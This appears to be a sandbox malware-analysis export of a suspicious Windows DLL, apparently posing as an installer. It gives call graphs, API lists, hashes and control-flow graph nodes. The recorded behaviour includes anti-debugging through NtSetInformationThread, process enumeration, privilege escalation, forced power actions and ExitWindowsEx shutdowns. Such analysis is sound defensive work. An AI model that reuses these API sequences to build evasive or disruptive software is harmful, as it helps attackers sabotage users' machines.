100482->100509 100484->100342 100485->100342 100487 6cc50cd1 100486->100487 100488 6cc50bd3 100486->100488 100487->100488 100489 6cc59c60 18 API calls 100487->100489 100492 6cc5873e 100488->100492 100490 6cc50cef 100489->100490 100510 6cc5bb6c 100490->100510 100493 6cc58755 100492->100493 100494 6cc50bdb 100492->100494 100493->100494 100566 6cc547bb HeapFree GetLastError __dosmaperr 100493->100566 100496 6cc59c60 100494->100496 100497 6cc59c81 100496->100497 100498 6cc59c6c 100496->100498 100497->100480 100567 6cc50120 18 API calls __fassign 100498->100567 100500 6cc59c7c 100500->100480 100502 6cc5b8be 100501->100502 100503 6cc5b8a9 __dosmaperr 100501->100503 100504 6cc5b907 __dosmaperr 100502->100504 100505 6cc5b8e5 100502->100505 100503->100482 100576 6cc50120 18 API calls __fassign 100504->100576 100568 6cc5b9c1 100505->100568 100508->100476 100509->100476 100511 6cc5bb78 __wsopen_s 100510->100511 100512 6cc5bbca 100511->100512 100514 6cc5bc33 __dosmaperr 100511->100514 100517 6cc5bb80 __dosmaperr 100511->100517 100521 6cc61990 EnterCriticalSection 100512->100521 100551 6cc50120 18 API calls __fassign 100514->100551 100515 6cc5bbd0 100519 6cc5bbec __dosmaperr 100515->100519 100522 6cc5bc5e 100515->100522 100517->100488 100550 6cc5bc2b LeaveCriticalSection __wsopen_s 100519->100550 100521->100515 100523 6cc5bc80 100522->100523 100549 6cc5bc9c __dosmaperr 100522->100549 100524 6cc5bcd4 100523->100524 100526 6cc5bc84 __dosmaperr 100523->100526 100525 6cc5bce7 100524->100525 100560 6cc5ac69 20 API calls __wsopen_s 100524->100560 100552 6cc5be40 100525->100552 100559 6cc50120 18 API calls __fassign 100526->100559 100531 6cc5bcfd 100533 6cc5bd26 100531->100533 100534 6cc5bd01 100531->100534 100532 6cc5bd3c 100535 6cc5bd95 WriteFile 100532->100535 100536 6cc5bd50 100532->100536 100562 6cc5beb1 43 API calls 5 library calls 100533->100562 100534->100549 100561 6cc5c25b 6 API calls __wsopen_s 100534->100561 100538 6cc5bdb9 GetLastError 100535->100538 100535->100549 100539 6cc5bd85 100536->100539 100540 6cc5bd5b 100536->100540 100538->100549 100565 6cc5c2c3 7 API calls 2 library calls 100539->100565 100543 6cc5bd75 100540->100543 100544 6cc5bd60 100540->100544 100564 6cc5c487 8 API calls 3 library calls 100543->100564 100547 6cc5bd65 100544->100547 100544->100549 100546 6cc5bd73 100546->100549 100563 6cc5c39e 7 API calls 2 library calls 100547->100563 100549->100519 100550->100517 100551->100517 100553 6cc619e5 __wsopen_s 18 API calls 100552->100553 100555 6cc5be51 100553->100555 100554 6cc5bcf8 100554->100531 100554->100532 100555->100554 100556 6cc549b2 __Getctype 37 API calls 100555->100556 100557 6cc5be74 100556->100557 100557->100554 100558 6cc5be8e GetConsoleMode 100557->100558 100558->100554 100559->100549 100560->100525 100561->100549 100562->100549 100563->100546 100564->100546 100565->100546 100566->100494 100567->100500 100569 6cc5b9cd __wsopen_s 100568->100569 100577 6cc61990 EnterCriticalSection 100569->100577 100571 6cc5b9db 100573 6cc5ba08 100571->100573 100578 6cc5b925 100571->100578 100591 6cc5ba41 LeaveCriticalSection __wsopen_s 100573->100591 100575 6cc5ba2a 100575->100503 100576->100503 100577->100571 100592 6cc615a2 100578->100592 100580 6cc5b935 100581 6cc5b93b 100580->100581 100583 6cc5b96d 100580->100583 100585 6cc615a2 __wsopen_s 18 API calls 100580->100585 100597 6cc6171f SetStdHandle __dosmaperr __wsopen_s 100581->100597 100583->100581 100584 6cc615a2 __wsopen_s 18 API calls 100583->100584 100587 6cc5b979 CloseHandle 100584->100587 100586 6cc5b964 100585->100586 100588 6cc615a2 __wsopen_s 18 API calls 100586->100588 100587->100581 100589 6cc5b985 GetLastError 100587->100589 100588->100583 100589->100581 100590 6cc5b993 __dosmaperr 100590->100573 100591->100575 100593 6cc615af __dosmaperr 100592->100593 100595 6cc615c4 __dosmaperr 100592->100595 100593->100580 100594 6cc615e9 100594->100580 100595->100594 100596 6cc50120 __fassign 18 API calls 100595->100596 100596->100593 100597->100590 100598->100191 100599->100193 100600->100195 100602 6cc465dc 100601->100602 100603 6cc46608 100601->100603 100604 6cc46601 100602->100604 100624 6cb12250 30 API calls 100602->100624 100605 6cc46619 100603->100605 100622 6cb13560 32 API calls std::_Xinvalid_argument 100603->100622 100604->100205 100605->100604 100623 6cb12f60 42 API calls 4 library calls 100605->100623 100608 6cc467e8 100625 6cb12340 24 API calls 100608->100625 100610 6cc467f7 100626 6cc49379 RaiseException 100610->100626 100614 6cc46827 100628 6cb12340 24 API calls 100614->100628 100616 6cc4683d 100629 6cc49379 RaiseException 100616->100629 100618 6cc46653 100618->100604 100627 6cb12250 30 API calls 100618->100627 100619->100205 100620->100205 100621->100205 100622->100605 100623->100618 100624->100608 100625->100610 100626->100618 100627->100614 100628->100616 100629->100604 100630->100213 100631->100211 100632->100213 100633->100213 100634->100213 100636 6cb1022e 100635->100636 100637 6cb104d6 100636->100637 100642 6cc517db 100636->100642 100637->100222 100639->100224 100640->100226 100641->100228 100643 6cc51806 100642->100643 100644 6cc517e9 100642->100644 100643->100636 100644->100643 100645 6cc517f6 100644->100645 100646 6cc5180a 100644->100646 100658 6cc50120 18 API calls __fassign 100645->100658 100650 6cc51a02 100646->100650 100651 6cc51a0e __wsopen_s 100650->100651 100659 6cc4c5a9 EnterCriticalSection 100651->100659 100653 6cc51a1c 100660 6cc519bf 100653->100660 100657 6cc5183c 100657->100636 100658->100643 100659->100653 100668 6cc585a6 100660->100668 100666 6cc519f9 100667 6cc51a51 LeaveCriticalSection 100666->100667 100667->100657 100669 6cc59c60 18 API calls 100668->100669 100670 6cc585b7 100669->100670 100671 6cc619e5 __wsopen_s 18 API calls 100670->100671 100672 6cc585bd __wsopen_s 100671->100672 100674 6cc519d3 100672->100674 100685 6cc547bb HeapFree GetLastError __dosmaperr 100672->100685 100675 6cc5183e 100674->100675 100676 6cc5186e 100675->100676 100678 6cc51850 100675->100678 100684 6cc58659 62 API calls 100676->100684 100677 6cc5185e 100686 6cc50120 18 API calls __fassign 100677->100686 100678->100676 100678->100677 100680 6cc51886 _Yarn 100678->100680 100680->100676 100681 6cc50cb9 62 API calls 100680->100681 100682 6cc59c60 18 API calls 100680->100682 100683 6cc5bb6c __wsopen_s 62 API calls 100680->100683 100681->100680 100682->100680 100683->100680 100684->100666 100685->100674 100686->100676 100687->100245 100688->100247 100689->100249 100690->100146 100691->100153 100692->100155 100693->100148 100694->100151 100695 6cc4ef3f 100696 6cc4ef4b __wsopen_s 100695->100696 100697 6cc4ef52 GetLastError ExitThread 100696->100697 100698 6cc4ef5f 100696->100698 100707 6cc549b2 GetLastError 100698->100707 100703 6cc4ef7b 100740 6cc4eeaa 16 API calls 2 library calls 100703->100740 100706 6cc4ef9d 100708 6cc549cf 100707->100708 100709 6cc549c9 100707->100709 100713 6cc549d5 SetLastError 100708->100713 100742 6cc56b62 6 API calls std::_Lockit::_Lockit 100708->100742 100741 6cc56b23 6 API calls std::_Lockit::_Lockit 100709->100741 100712 6cc549ed 100712->100713 100714 6cc549f1 100712->100714 100720 6cc4ef64 100713->100720 100721 6cc54a69 100713->100721 100743 6cc571e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100714->100743 100717 6cc549fd 100718 6cc54a05 100717->100718 100719 6cc54a1c 100717->100719 100744 6cc56b62 6 API calls std::_Lockit::_Lockit 100718->100744 100746 6cc56b62 6 API calls std::_Lockit::_Lockit 100719->100746 100734 6cc59d66 100720->100734 100749 6cc50ac9 37 API calls std::locale::_Setgloballocale 100721->100749 100726 6cc54a28 100728 6cc54a3d 100726->100728 100729 6cc54a2c 100726->100729 100727 6cc54a13 100745 6cc547bb HeapFree GetLastError __dosmaperr 100727->100745 100748 6cc547bb HeapFree GetLastError __dosmaperr 100728->100748 100747 6cc56b62 6 API calls std::_Lockit::_Lockit 100729->100747 100732 6cc54a19 100732->100713 100735 6cc4ef6f 100734->100735 100736 6cc59d78 GetPEB 100734->100736 100735->100703 100739 6cc56d6f 5 API calls std::_Lockit::_Lockit 100735->100739 100736->100735 100737 6cc59d8b 100736->100737 100750 6cc56e18 5 API calls std::_Lockit::_Lockit 100737->100750 100739->100703 100740->100706 100741->100708 100742->100712 100743->100717 100744->100727 100745->100732 100746->100726 100747->100727 100748->100732 100750->100735 100751 6cadf8a3 100753 6cadf887 100751->100753 100752 6cae02ac GetCurrentProcess TerminateProcess 100754 6cae02ca 100752->100754 100753->100752 100755 6cac3d62 100757 6cac3bc0 100755->100757 100756 6cac3e8a GetCurrentThread NtSetInformationThread 100758 6cac3eea 100756->100758 100757->100756 100759 6cad3b72 100760 6cc46a43 std::_Facet_Register 4 API calls 100759->100760 100768 6cad37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 100760->100768 100761 6cc3aec0 2 API calls 100761->100768 100762 6cae639e 100782 6cc50130 18 API calls 2 library calls 100762->100782 100764 6cae6ba0 104 API calls 100764->100768 100766 6cae7090 77 API calls 100766->100768 100767 6cb0e010 67 API calls 100767->100768 100768->100761 100768->100762 100768->100764 100768->100766 100768->100767 100772 6cae6e60 100768->100772 100773 6cae6e9f 100772->100773 100776 6cae6eb3 100773->100776 100783 6cb13560 32 API calls std::_Xinvalid_argument 100773->100783 100778 6cae6f5b 100776->100778 100785 6cb12250 30 API calls 100776->100785 100786 6cb126e0 24 API calls 4 library calls 100776->100786 100787 6cc49379 RaiseException 100776->100787 100777 6cae6f6e 100777->100768 100778->100777 100784 6cb137e0 32 API calls std::_Xinvalid_argument 100778->100784 100783->100776 100784->100777 100785->100776 100786->100776 100787->100776 100788 6cac4b53 100789 6cc46a43 std::_Facet_Register 4 API calls 100788->100789 100790 6cac4b5c _Yarn 100789->100790 100791 6cc3aec0 2 API calls 100790->100791 100796 6cac4bae std::ios_base::_Ios_base_dtor 100791->100796 100792 6cae639e 100969 6cc50130 18 API calls 2 library calls 100792->100969 100794 6cac4cff 100795 6cac5164 CreateFileA CloseHandle 100800 6cac51ec 100795->100800 100796->100792 100796->100794 100796->100795 100797 6cad245a _Yarn _strlen 100796->100797 100797->100792 100799 6cc3aec0 2 API calls 100797->100799 100806 6cad2a83 std::ios_base::_Ios_base_dtor 100799->100806 100946 6cc45120 OpenSCManagerA 100800->100946 100802 6cacfc00 100962 6cc45240 CreateToolhelp32Snapshot 100802->100962 100805 6cc46a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100840 6cac5478 std::ios_base::_Ios_base_dtor _Yarn _strlen 100805->100840 100806->100792 100950 6cc30390 100806->100950 100808 6cad37d0 Sleep 100852 6cad37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 100808->100852 100809 6cc3aec0 2 API calls 100809->100840 100810 6cae63b2 100970 6cac15e0 18 API calls std::ios_base::_Ios_base_dtor 100810->100970 100811 6cc45240 4 API calls 100828 6cad053a 100811->100828 100812 6cc45240 4 API calls 100833 6cad12e2 100812->100833 100814 6cae64f8 100815 6cacffe3 100815->100811 100819 6cad0abc 100815->100819 100816 6cae6ba0 104 API calls 100816->100840 100817 6cae6e60 32 API calls 100817->100840 100819->100797 100819->100812 100820 6cae7090 77 API calls 100820->100840 100821 6cc45240 4 API calls 100821->100819 100822 6cc45240 4 API calls 100841 6cad1dd9 100822->100841 100823 6cad211c 100823->100797 100824 6cad241a 100823->100824 100827 6cc30390 11 API calls 100824->100827 100825 6cc3aec0 2 API calls 100825->100852 100826 6cb0e010 67 API calls 100826->100840 100830 6cad244d 100827->100830 100828->100819 100828->100821 100829 6cac6722 100959 6cc41880 25 API calls 4 library calls 100829->100959 100968 6cc45d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100830->100968 100832 6cad2452 Sleep 100832->100797 100833->100822 100833->100823 100845 6cad16ac 100833->100845 100834 6cac6162 100835 6cac740b 100836 6cc44ff0 4 API calls 100835->100836 100844 6cac775a _strlen 100836->100844 100837 6cc45240 4 API calls 100837->100823 100838 6cae6ba0 104 API calls 100838->100852 100839 6cae6e60 32 API calls 100839->100852 100840->100792 100840->100802 100840->100805 100840->100809 100840->100816 100840->100817 100840->100820 100840->100826 100840->100829 100840->100834 100841->100823 100841->100837 100842 6cae7090 77 API calls 100842->100852 100843 6cb0e010 67 API calls 100843->100852 100844->100792 100846 6cac7ba9 100844->100846 100847 6cac7b92 100844->100847 100850 6cac7b43 _Yarn 100844->100850 100849 6cc46a43 std::_Facet_Register 4 API calls 100846->100849 100848 6cc46a43 std::_Facet_Register 4 API calls 100847->100848 100848->100850 100849->100850 100851 6cc3aec0 2 API calls 100850->100851 100861 6cac7be7 std::ios_base::_Ios_base_dtor 100851->100861 100852->100792 100852->100825 100852->100838 100852->100839 100852->100842 100852->100843 100853 6cc44ff0 4 API calls 100864 6cac8a07 100853->100864 100854 6cac9d7f 100858 6cc46a43 std::_Facet_Register 4 API calls 100854->100858 100855 6cac9d68 100857 6cc46a43 std::_Facet_Register 4 API calls 100855->100857 100856 6cac962c _strlen 100856->100792 100856->100854 100856->100855 100859 6cac9d18 _Yarn 100856->100859 100857->100859 100858->100859 100860 6cc3aec0 2 API calls 100859->100860 100867 6cac9dbd std::ios_base::_Ios_base_dtor 100860->100867 100861->100792 100861->100853 100861->100856 100862 6cac8387 100861->100862 100863 6cc44ff0 4 API calls 100872 6cac9120 100863->100872 100864->100863 100865 6cc44ff0 4 API calls 100882 6caca215 _strlen 100865->100882 100866 6cc44ff0 4 API calls 100869 6cac9624 100866->100869 100867->100792 100867->100865 100873 6cace8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100867->100873 100868 6cc46a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100868->100873 100960 6cc45d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100869->100960 100871 6cc3aec0 2 API calls 100871->100873 100872->100866 100873->100792 100873->100868 100873->100871 100874 6cacf7b1 100873->100874 100875 6caced02 Sleep 100873->100875 100961 6cc45d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100874->100961 100894 6cace8c1 100875->100894 100877 6caca9bb 100881 6cc46a43 std::_Facet_Register 4 API calls 100877->100881 100878 6caca9a4 100880 6cc46a43 std::_Facet_Register 4 API calls 100878->100880 100879 6cace8dd GetCurrentProcess TerminateProcess 100879->100873 100889 6caca953 _Yarn _strlen 100880->100889 100881->100889 100882->100792 100882->100877 100882->100878 100882->100889 100883 6cc44ff0 4 API calls 100883->100894 100884 6cacfbb8 100885 6cacfbe8 ExitWindowsEx Sleep 100884->100885 100885->100802 100886 6cacf7c0 100886->100884 100887 6cacb009 100891 6cc46a43 std::_Facet_Register 4 API calls 100887->100891 100888 6cacaff0 100890 6cc46a43 std::_Facet_Register 4 API calls 100888->100890 100889->100810 100889->100887 100889->100888 100892 6cacafa0 _Yarn 100889->100892 100890->100892 100891->100892 100893 6cc45960 104 API calls 100892->100893 100895 6cacb059 std::ios_base::_Ios_base_dtor _strlen 100893->100895 100894->100873 100894->100879 100894->100883 100895->100792 100896 6cacb42c 100895->100896 100897 6cacb443 100895->100897 100900 6cacb3da _Yarn _strlen 100895->100900 100898 6cc46a43 std::_Facet_Register 4 API calls 100896->100898 100899 6cc46a43 std::_Facet_Register 4 API calls 100897->100899 100898->100900 100899->100900 100900->100810 100901 6cacb79e 100900->100901 100902 6cacb7b7 100900->100902 100905 6cacb751 _Yarn 100900->100905 100903 6cc46a43 std::_Facet_Register 4 API calls 100901->100903 100904 6cc46a43 std::_Facet_Register 4 API calls 100902->100904 100903->100905 100904->100905 100906 6cc45960 104 API calls 100905->100906 100907 6cacb804 std::ios_base::_Ios_base_dtor _strlen 100906->100907 100907->100792 100908 6cacbc0f 100907->100908 100909 6cacbc26 100907->100909 100912 6cacbbbd _Yarn _strlen 100907->100912 100910 6cc46a43 std::_Facet_Register 4 API calls 100908->100910 100911 6cc46a43 std::_Facet_Register 4 API calls 100909->100911 100910->100912 100911->100912 100912->100810 100913 6cacc08e 100912->100913 100914 6cacc075 100912->100914 100917 6cacc028 _Yarn 100912->100917 100916 6cc46a43 std::_Facet_Register 4 API calls 100913->100916 100915 6cc46a43 std::_Facet_Register 4 API calls 100914->100915 100915->100917 100916->100917 100918 6cc45960 104 API calls 100917->100918 100923 6cacc0db std::ios_base::_Ios_base_dtor _strlen 100918->100923 100919 6cacc7bc 100922 6cc46a43 std::_Facet_Register 4 API calls 100919->100922 100920 6cacc7a5 100921 6cc46a43 std::_Facet_Register 4 API calls 100920->100921 100930 6cacc753 _Yarn _strlen 100921->100930 100922->100930 100923->100792 100923->100919 100923->100920 100923->100930 100924 6cacd3ed 100926 6cc46a43 std::_Facet_Register 4 API calls 100924->100926 100925 6cacd406 100927 6cc46a43 std::_Facet_Register 4 API calls 100925->100927 100928 6cacd39a _Yarn 100926->100928 100927->100928 100929 6cc45960 104 API calls 100928->100929 100931 6cacd458 std::ios_base::_Ios_base_dtor _strlen 100929->100931 100930->100810 100930->100924 100930->100925 100930->100928 100936 6caccb2f 100930->100936 100931->100792 100932 6cacd8bb 100931->100932 100933 6cacd8a4 100931->100933 100937 6cacd852 _Yarn _strlen 100931->100937 100935 6cc46a43 std::_Facet_Register 4 API calls 100932->100935 100934 6cc46a43 std::_Facet_Register 4 API calls 100933->100934 100934->100937 100935->100937 100937->100810 100938 6cacdccf 100937->100938 100939 6cacdcb6 100937->100939 100942 6cacdc69 _Yarn 100937->100942 100941 6cc46a43 std::_Facet_Register 4 API calls 100938->100941 100940 6cc46a43 std::_Facet_Register 4 API calls 100939->100940 100940->100942 100941->100942 100943 6cc45960 104 API calls 100942->100943 100945 6cacdd1c std::ios_base::_Ios_base_dtor 100943->100945 100944 6cc44ff0 4 API calls 100944->100873 100945->100792 100945->100944 100947 6cc45156 100946->100947 100948 6cc451e8 OpenServiceA 100947->100948 100949 6cc4522f 100947->100949 100948->100947 100949->100840 100956 6cc303a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 100950->100956 100951 6cc3310e CloseHandle 100951->100956 100952 6cc33f5f CloseHandle 100952->100956 100953 6cad37cb 100958 6cc45d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100953->100958 100954 6cc1c1e0 WriteFile WriteFile WriteFile ReadFile 100954->100956 100955 6cc3251b CloseHandle 100955->100956 100956->100951 100956->100952 100956->100953 100956->100954 100956->100955 100971 6cc1b730 100956->100971 100958->100808 100959->100835 100960->100856 100961->100886 100965 6cc452a0 std::locale::_Setgloballocale 100962->100965 100963 6cc45277 CloseHandle 100963->100965 100964 6cc45320 Process32NextW 100964->100965 100965->100963 100965->100964 100966 6cc453b1 100965->100966 100967 6cc45345 Process32FirstW 100965->100967 100966->100815 100967->100965 100968->100832 100970->100814 100972 6cc1b743 _Yarn __wsopen_s std::locale::_Setgloballocale 100971->100972 100973 6cc1c180 100972->100973 100974 6cc1bced CreateFileA 100972->100974 100976 6cc1aa30 100972->100976 100973->100956 100974->100972 100977 6cc1aa43 __wsopen_s std::locale::_Setgloballocale 100976->100977 100978 6cc1b3e9 WriteFile 100977->100978 100979 6cc1b43d WriteFile 100977->100979 100980 6cc1b718 100977->100980 100981 6cc1ab95 ReadFile 100977->100981 100978->100977 100979->100977 100980->100972 100981->100977
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID: HR^
                                          • API String ID: 4218353326-1341859651
                                          • Opcode ID: 9f938ec4b4a4507f114673b1ccc16e25d74e78e61d576f8e6312f8572375689b
                                          • Instruction ID: 23d7c5a5d5d7e93e778c4b05745a0efcd8b1d9721196d815e746cae90fe016b0
                                          • Opcode Fuzzy Hash: 9f938ec4b4a4507f114673b1ccc16e25d74e78e61d576f8e6312f8572375689b
                                          • Instruction Fuzzy Hash: 26740471745B028FC728CF28C8D0695B7F3EF95318B1D8A2DC0A68BA55E774B58ACB41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: }jk$;T55$L@^
                                          • API String ID: 0-4218709813
                                          • Opcode ID: 861286d6b7e1b9f76b1ecedcee8d6d49d2efbccdb3e37ddee1a06f5c473a2d33
                                          • Instruction ID: 3aff750909e00aefe073f5731332811bdbfc0cb2f1976300dfe6d31182aedd9d
                                          • Opcode Fuzzy Hash: 861286d6b7e1b9f76b1ecedcee8d6d49d2efbccdb3e37ddee1a06f5c473a2d33
                                          • Instruction Fuzzy Hash: 6D341971645B018FC728CF28C8D0695B7F3EF95318B1E8A6DC0968BB55EB34B58ACB50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7677 6cc45240-6cc45275 CreateToolhelp32Snapshot 7678 6cc452a0-6cc452a9 7677->7678 7679 6cc452e0-6cc452e5 7678->7679 7680 6cc452ab-6cc452b0 7678->7680 7681 6cc45377-6cc453a1 call 6cc52c05 7679->7681 7682 6cc452eb-6cc452f0 7679->7682 7683 6cc45315-6cc4531a 7680->7683 7684 6cc452b2-6cc452b7 7680->7684 7681->7678 7685 6cc45277-6cc45292 CloseHandle 7682->7685 7686 6cc452f2-6cc452f7 7682->7686 7687 6cc453a6-6cc453ab 7683->7687 7688 6cc45320-6cc45332 Process32NextW 7683->7688 7690 6cc45334-6cc4535d call 6cc4b920 Process32FirstW 7684->7690 7691 6cc452b9-6cc452be 7684->7691 7685->7678 7686->7678 7693 6cc452f9-6cc45313 7686->7693 7687->7678 7697 6cc453b1-6cc453bf 7687->7697 7694 6cc45362-6cc45372 7688->7694 7690->7694 7691->7678 7692 6cc452c0-6cc452d1 7691->7692 7692->7678 7693->7678 7694->7678
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CC4524E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: CreateSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3332741929-0
                                          • Opcode ID: 21b387dd9c27b28afb4150459c57f9145a864f2fdcdd90aee691105c0aa81fd5
                                          • Instruction ID: 3b9e8b65989b364b3988870c062c9a558323955cfe3f433b618b5de849ef03ec
                                          • Opcode Fuzzy Hash: 21b387dd9c27b28afb4150459c57f9145a864f2fdcdd90aee691105c0aa81fd5
                                          • Instruction Fuzzy Hash: EE315E786083009FD7209F29C888B0ABBF5BF95758F51C92EE998C7360E371D8488B52

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7821 6cac3886-6cac388e 7822 6cac3894-6cac3896 7821->7822 7823 6cac3970-6cac397d 7821->7823 7822->7823 7824 6cac389c-6cac38b9 7822->7824 7825 6cac397f-6cac3989 7823->7825 7826 6cac39f1-6cac39f8 7823->7826 7830 6cac38c0-6cac38c1 7824->7830 7825->7824 7827 6cac398f-6cac3994 7825->7827 7828 6cac39fe-6cac3a03 7826->7828 7829 6cac3ab5-6cac3aba 7826->7829 7831 6cac399a-6cac399f 7827->7831 7832 6cac3b16-6cac3b18 7827->7832 7833 6cac3a09-6cac3a2f 7828->7833 7834 6cac38d2-6cac38d4 7828->7834 7829->7824 7836 6cac3ac0-6cac3ac7 7829->7836 7835 6cac395e 7830->7835 7837 6cac383b-6cac3855 call 6cc11470 call 6cc11480 7831->7837 7838 6cac39a5-6cac39bf 7831->7838 7832->7830 7839 6cac38f8-6cac3955 7833->7839 7840 6cac3a35-6cac3a3a 7833->7840 7841 6cac3957-6cac395c 7834->7841 7842 6cac3960-6cac3964 7835->7842 7836->7830 7843 6cac3acd-6cac3ad6 7836->7843 7849 6cac3860-6cac3885 7837->7849 7844 6cac3a5a-6cac3a5d 7838->7844 7839->7841 7845 6cac3b1d-6cac3b22 7840->7845 7846 6cac3a40-6cac3a57 7840->7846 7841->7835 7848 6cac396a 7842->7848 7842->7849 7843->7832 7850 6cac3ad8-6cac3aeb 7843->7850 7854 6cac3aa9-6cac3ab0 7844->7854 7852 6cac3b49-6cac3b50 7845->7852 7853 6cac3b24-6cac3b44 7845->7853 7846->7844 7856 6cac3ba1-6cac3bb6 7848->7856 7849->7821 7850->7839 7857 6cac3af1-6cac3af8 7850->7857 7852->7830 7862 6cac3b56-6cac3b5d 7852->7862 7853->7854 7854->7842 7863 6cac3bc0-6cac3bda call 6cc11470 call 6cc11480 7856->7863 7858 6cac3afa-6cac3aff 7857->7858 7859 6cac3b62-6cac3b85 7857->7859 7858->7841 7859->7839 7866 6cac3b8b 7859->7866 7862->7842 7872 6cac3be0-6cac3bfe 7863->7872 7866->7856 7875 6cac3e7b 7872->7875 7876 6cac3c04-6cac3c11 7872->7876 7879 6cac3e81-6cac3ee0 call 6cac3750 GetCurrentThread NtSetInformationThread 7875->7879 7877 6cac3c17-6cac3c20 7876->7877 7878 6cac3ce0-6cac3cea 7876->7878 7880 6cac3dc5 7877->7880 7881 6cac3c26-6cac3c2d 7877->7881 7882 6cac3cec-6cac3d0c 7878->7882 7883 6cac3d3a-6cac3d3c 7878->7883 7898 6cac3eea-6cac3f04 call 6cc11470 call 6cc11480 7879->7898 7887 6cac3dc6 7880->7887 7885 6cac3dc3 7881->7885 7886 6cac3c33-6cac3c3a 7881->7886 7888 6cac3d90-6cac3d95 7882->7888 7889 6cac3d3e-6cac3d45 7883->7889 7890 6cac3d70-6cac3d8d 7883->7890 7885->7880 7892 6cac3e26-6cac3e2b 7886->7892 7893 6cac3c40-6cac3c5b 7886->7893 7894 6cac3dc8-6cac3dcc 7887->7894 7896 6cac3dba-6cac3dc1 7888->7896 7897 6cac3d97-6cac3db8 7888->7897 7895 6cac3d50-6cac3d57 7889->7895 7890->7888 7901 6cac3c7b-6cac3cd0 7892->7901 7902 6cac3e31 7892->7902 7903 6cac3e1b-6cac3e24 7893->7903 7894->7872 7904 6cac3dd2 7894->7904 7895->7887 7896->7885 7900 6cac3dd7-6cac3ddc 7896->7900 7897->7880 7915 6cac3f75-6cac3fa1 7898->7915 7906 6cac3dde-6cac3e17 7900->7906 7907 6cac3e36-6cac3e3d 7900->7907 7901->7895 7902->7863 7903->7894 7908 6cac3e76-6cac3e79 7903->7908 7904->7908 7906->7903 7911 6cac3e5c-6cac3e5f 7907->7911 7912 6cac3e3f-6cac3e5a 7907->7912 7908->7879 7911->7901 7914 6cac3e65-6cac3e69 7911->7914 7912->7903 7914->7894 7914->7908 7919 6cac4020-6cac4026 7915->7919 7920 6cac3fa3-6cac3fa8 7915->7920 7921 6cac402c-6cac403c 7919->7921 7922 6cac3f06-6cac3f35 7919->7922 7923 6cac407c-6cac4081 7920->7923 7924 6cac3fae-6cac3fcf 7920->7924 7925 6cac403e-6cac4058 7921->7925 7926 6cac40b3-6cac40b8 7921->7926 7929 6cac3f38-6cac3f61 7922->7929 7927 6cac40aa-6cac40ae 